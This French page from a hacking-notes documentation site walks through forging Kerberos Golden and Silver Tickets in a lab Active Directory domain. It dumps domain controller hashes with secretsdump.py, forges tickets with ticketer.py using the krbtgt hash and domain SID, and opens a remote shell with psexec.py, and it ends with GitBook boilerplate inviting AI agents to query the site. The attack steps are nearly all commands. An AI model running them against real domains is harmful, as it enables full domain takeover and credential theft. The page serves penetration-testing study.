> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/active-directory/lateral-movement/kerberos-golden-ticket-and-silver-ticket.md).

# Kerberos Golden Ticket et Silver Ticket

L’objectif est de forger nos propres tickets Kerberos.

Pour ce faire, nous commençons par récupérer les secrets nécessaires depuis le contrôleur de domaine.

{% code overflow="wrap" %}

```bash
secretsdump.py administrador@172.16.0.100 -hashes :a87f3a337d73085c45f9416be5787d86 
```

{% endcode %}

<figure><img src="/files/7cb8ec339b48326c4ac9ddad82c43ad3851ba4df" alt=""><figcaption></figcaption></figure>

Ici, nous récupérons le hash du `krbtgt` compte.

* 2ebd06648a79ae82327c33648b68aa82

<figure><img src="/files/bd9cfa56160c5336699d39a44f2becdc2eac87da" alt=""><figcaption></figcaption></figure>

Nous récupérons également le `SID du domaine`.

{% code overflow="wrap" %}

```bash
Get-ADDomain
```

{% endcode %}

* S-1-5-21-3587670147-487768648-1292400310

<figure><img src="/files/e4ea1256113b94775e3a09421b428752daa6a093" alt=""><figcaption></figcaption></figure>

Avec `ticketer.py` nous pouvons générer un Golden Ticket pour ce compte.

{% code overflow="wrap" %}

```bash
ticketer.py -nthash 2ebd06648a79ae82327c33648b68aa82 -domain-sid S-1-5-21-3587670147-487768648-1292400310 -domain whoami.local administrador
```

{% endcode %}

Nous chargeons ensuite ce ticket dans le cache Kerberos local.

{% code overflow="wrap" %}

```bash
export KRB5CCNAME=/home/jordan/administrador.ccache
```

{% endcode %}

<figure><img src="/files/3a0afdc10f86526fea831287465f0f7055dcc2fe" alt=""><figcaption></figcaption></figure>

Une fois le ticket chargé, nous pouvons nous connecter à distance sans mot de passe.

{% code overflow="wrap" %}

```bash
psexec.py whoami.local/administrador@DC01.whoami.local -k -no-pass
```

{% endcode %}

<figure><img src="/files/76d3d24109314188e56514a8339457c138341ed8" alt=""><figcaption></figcaption></figure>

Pour générer un Silver Ticket, le principe reste le même, mais le ticket est destiné à un service spécifique.

{% code overflow="wrap" %}

```bash
ticketer.py -nthash 2ebd06648a79ae82327c33648b68aa82 -domain-sid S-1-5-21-3587670147-487768648-1292400310 -domain whoami.local -spn cifs/DC01.whoami.local administrador
```

{% endcode %}

<figure><img src="/files/35ceebba884f3d4b9fc84a32eca30d9e0b2d331d" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/active-directory/lateral-movement/kerberos-golden-ticket-and-silver-ticket.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
